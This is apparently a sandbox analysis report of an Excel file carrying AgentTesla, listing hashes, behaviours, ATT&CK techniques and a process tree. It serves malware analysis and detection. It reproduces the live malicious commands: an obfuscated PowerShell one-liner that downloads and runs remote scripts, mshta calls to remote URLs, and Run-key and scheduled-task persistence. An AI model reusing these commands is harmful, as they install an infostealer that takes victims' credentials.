agenttesla | d685747fcfcdf80f50b8611fa8f6d992a0d702330a117cb137d8cce80594e696

General

Target

KT-704-3403.xls
Size

35KB
MD5

231cec4f63028cdcdac30caa196d45b0
SHA1

40e0a297b92c7ed3451f0e2aec37edb06018bf55
SHA256

d685747fcfcdf80f50b8611fa8f6d992a0d702330a117cb137d8cce80594e696
SHA512

498336bb5ff0c6465110e1286e787a1828697d4b34a9a1747ddb5f92b674297f8e7c803756030150f3b31410048137f2c98036b3d3b83d7d5765d7b537130f12

Score

10^/10

agenttesla collection keylogger persistence spyware stealer trojan

Malware Config

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4772	4324	mshta.exe	EXCEL.EXE

AgentTesla Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2120-293-0x000000000043754E-mapping.dmp	family_agenttesla
behavioral2/memory/3852-360-0x000000000043754E-mapping.dmp	family_agenttesla
behavioral2/memory/3852-366-0x0000000005270000-0x000000000576E000-memory.dmp	family_agenttesla

Blocklisted process makes network request 16 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
27	4772	mshta.exe
28	4772	mshta.exe
29	4772	mshta.exe
33	4772	mshta.exe
36	4772	mshta.exe
39	4772	mshta.exe
41	4772	mshta.exe
45	4772	mshta.exe
47	4772	mshta.exe
48	4772	mshta.exe
50	4772	mshta.exe
52	4772	mshta.exe
54	4772	mshta.exe
55	4772	mshta.exe
56	4772	mshta.exe
58	1028	powershell.exe

Drops file in Drivers directory 2 IoCs

Processes:

RegAsm.exejsc.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegAsm.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	jsc.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exejsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cleanreasdasdddsults = "\"MsHta\"\"http://1230948%[email protected]/p/17.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\takeCare = "pOweRshell.exe -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt').GetResponse().GetResponseStream()).ReadToend());"	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAFEsounkkkd = "\"MsHta\"\"http://1230948%[email protected]/p/17.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\Milalaasdasdlalal = "\"MsHta\"\"http://1230948%[email protected]/p/17.html\""	mshta.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 1028 set thread context of 2120	1028	powershell.exe	jsc.exe
PID 1028 set thread context of 3852	1028	powershell.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

5088 schtasks.exe

pid	process
5088	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

620 taskkill.exe
1200 taskkill.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4324 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

dw20.exepowershell.exejsc.exeRegAsm.exe

pid process

2020 dw20.exe
2020 dw20.exe
1028 powershell.exe
1028 powershell.exe
1028 powershell.exe
2120 jsc.exe
2120 jsc.exe
3852 RegAsm.exe
3852 RegAsm.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

jsc.exe

pid process

2120 jsc.exe

pid	process
620	taskkill.exe
1200	taskkill.exe

pid	process
2020	dw20.exe
2020	dw20.exe
1028	powershell.exe
1028	powershell.exe
1028	powershell.exe
2120	jsc.exe
2120	jsc.exe
3852	RegAsm.exe
3852	RegAsm.exe

pid	process
2120	jsc.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

taskkill.exetaskkill.exepowershell.exejsc.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	620	taskkill.exe
Token: SeDebugPrivilege	1200	taskkill.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeDebugPrivilege	2120	jsc.exe
Token: SeDebugPrivilege	3852	RegAsm.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

EXCEL.EXERegAsm.exejsc.exe

pid	process
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
4324	EXCEL.EXE
3852	RegAsm.exe
2120	jsc.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

EXCEL.EXEmshta.exepowershell.execsc.exe

description	pid	process	target process
PID 4324 wrote to memory of 4772	4324	EXCEL.EXE	mshta.exe
PID 4324 wrote to memory of 4772	4324	EXCEL.EXE	mshta.exe
PID 4772 wrote to memory of 620	4772	mshta.exe	taskkill.exe
PID 4772 wrote to memory of 620	4772	mshta.exe	taskkill.exe
PID 4772 wrote to memory of 1200	4772	mshta.exe	taskkill.exe
PID 4772 wrote to memory of 1200	4772	mshta.exe	taskkill.exe
PID 4772 wrote to memory of 5088	4772	mshta.exe	schtasks.exe
PID 4772 wrote to memory of 5088	4772	mshta.exe	schtasks.exe
PID 4772 wrote to memory of 1028	4772	mshta.exe	powershell.exe
PID 4772 wrote to memory of 1028	4772	mshta.exe	powershell.exe
PID 4772 wrote to memory of 2020	4772	mshta.exe	dw20.exe
PID 4772 wrote to memory of 2020	4772	mshta.exe	dw20.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 2120	1028	powershell.exe	jsc.exe
PID 1028 wrote to memory of 3624	1028	powershell.exe	csc.exe
PID 1028 wrote to memory of 3624	1028	powershell.exe	csc.exe
PID 3624 wrote to memory of 3976	3624	csc.exe	cvtres.exe
PID 3624 wrote to memory of 3976	3624	csc.exe	cvtres.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe
PID 1028 wrote to memory of 3852	1028	powershell.exe	RegAsm.exe

outlook_office_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

outlook_win_path 1 IoCs

Processes:

jsc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	jsc.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\KT-704-3403.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4324
- C:\Windows\SYSTEM32\mshta.exe
  mshta https://www.bitly.com/kddjkkdowkdowkdwwi
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4772
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:620
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/17.html\""
    3⤵
    - Creates scheduled task(s)
    PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_69d42a6ec0d74e3f8752710c7ad14fd9.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_86d4dc912a7d4ea2ae5d2599c31c5d1f.txt').GetResponse().GetResponseStream()).ReadToend());
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: SetClipboardViewer
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      outlook_office_path
      outlook_win_path
      PID:2120
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1rli0g2x\1rli0g2x.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3624
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES293E.tmp" "c:\Users\Admin\AppData\Local\Temp\1rli0g2x\CSCBEDBC6E88FF64CB588E53E91E148B488.TMP"
        5⤵
        
        PID:3976
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Drops file in Drivers directory
      Accesses Microsoft Outlook profiles
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3852
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    dw20.exe -x -s 3016
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2020

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

3

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Data from Local System

Email Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1rli0g2x\1rli0g2x.dll

MD5
69f13aea4030674a5a8e49743fa72d23

SHA1
5ef24f9cb12638480dc47a7a710e2f369c49ca82

SHA256
c1ee09848fb87b71e201a226aa8beb6c110915c65fa321730675febcbcb48d4e

SHA512
2e1760eeaaef0dcd43dd7a4aef340708cc84a03a9128c4e4175280269ed0d8d68706bc915ea31c3dbc1ef7bc409e52c362bad72fe0c0686be56336607d41b098

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES293E.tmp

MD5
d80b43084d9f0e5c7d3716304272ea5d

SHA1
ca0534993673597689aac5ba58fd7dc08fd01cf5

SHA256
1fc2f12bf79aacd828037c29827e2246fd8e0a5b709cf682979204cbeef5d301

SHA512
e586cbb980e304ef4ab4e17563d14327cc93ec6286e736ec03e60e646931da11fe6b6c6728340bc95833615932f328a82ea7dc1aa457d65d1231ab5fff99e96e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1rli0g2x\1rli0g2x.0.cs

MD5
e03b1e7ba7f1a53a7e10c0fd9049f437

SHA1
3bb851a42717eeb588eb7deadfcd04c571c15f41

SHA256
3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

SHA512
a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1rli0g2x\1rli0g2x.cmdline

MD5
59ea2f1db3141468852c3e2a3ef92912

SHA1
6a6e972fb34b3eb7e5006d972f1dad95a6319104

SHA256
7d94f5a08e1a325bc0c4ab1f762dc0f8e1321bf18c66fff5eaa39b609c3c1ae9

SHA512
8d843b3c498ec8e5e3d4ce84666606ef7855bbf909d87054f9cb06d7b1179e00156b8466a13b5f9fe9aaa3a8a7c357f64f7fef98108502a92c70ce9c4942da14

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1rli0g2x\CSCBEDBC6E88FF64CB588E53E91E148B488.TMP

MD5
5b5232c5e5126689201578f4cf68ddc0

SHA1
f89a6fd05c6e9a697d1f99f281a7b708db46a38b

SHA256
a144492cdfd6246b1d6988055c234f602e2bf9a4911f68d406a721fb4233d0da

SHA512
45c1b5d1952d589ddd56fc8651a1ff753f67dfd51f76913a62cd98bc882603bf4f47287468cb657ecaa3ccf55b33bb8590441293e08ce85d0b384c9d1142117b

Download Submit
memory/620-265-0x0000000000000000-mapping.dmp

Download
memory/1028-288-0x00000204CDCA6000-0x00000204CDCA8000-memory.dmp

Filesize
8KB

Download
memory/1028-275-0x00000204CDCA3000-0x00000204CDCA5000-memory.dmp

Filesize
8KB

Download
memory/1028-274-0x00000204CDCA0000-0x00000204CDCA2000-memory.dmp

Filesize
8KB

Download
memory/1028-268-0x0000000000000000-mapping.dmp

Download
memory/1200-266-0x0000000000000000-mapping.dmp

Download
memory/2020-269-0x0000000000000000-mapping.dmp

Download
memory/2120-293-0x000000000043754E-mapping.dmp

Download
memory/2120-350-0x0000000004960000-0x0000000004E5E000-memory.dmp

Filesize
5.0MB

Download
memory/2120-375-0x0000000004960000-0x0000000004E5E000-memory.dmp

Filesize
5.0MB

Download
memory/3624-351-0x0000000000000000-mapping.dmp

Download
memory/3852-360-0x000000000043754E-mapping.dmp

Download
memory/3852-366-0x0000000005270000-0x000000000576E000-memory.dmp

Filesize
5.0MB

Download
memory/3852-376-0x0000000005270000-0x000000000576E000-memory.dmp

Filesize
5.0MB

Download
memory/3976-354-0x0000000000000000-mapping.dmp

Download
memory/4324-129-0x00007FFE1F060000-0x00007FFE1F070000-memory.dmp

Filesize
64KB

Download
memory/4324-128-0x00007FFE1F060000-0x00007FFE1F070000-memory.dmp

Filesize
64KB

Download
memory/4324-115-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4324-122-0x0000012F739B0000-0x0000012F739B2000-memory.dmp

Filesize
8KB

Download
memory/4324-121-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4324-119-0x0000012F739B0000-0x0000012F739B2000-memory.dmp

Filesize
8KB

Download
memory/4324-120-0x0000012F739B0000-0x0000012F739B2000-memory.dmp

Filesize
8KB

Download
memory/4324-118-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4324-117-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4324-116-0x00007FFE228C0000-0x00007FFE228D0000-memory.dmp

Filesize
64KB

Download
memory/4772-263-0x0000000000000000-mapping.dmp

Download
memory/5088-267-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads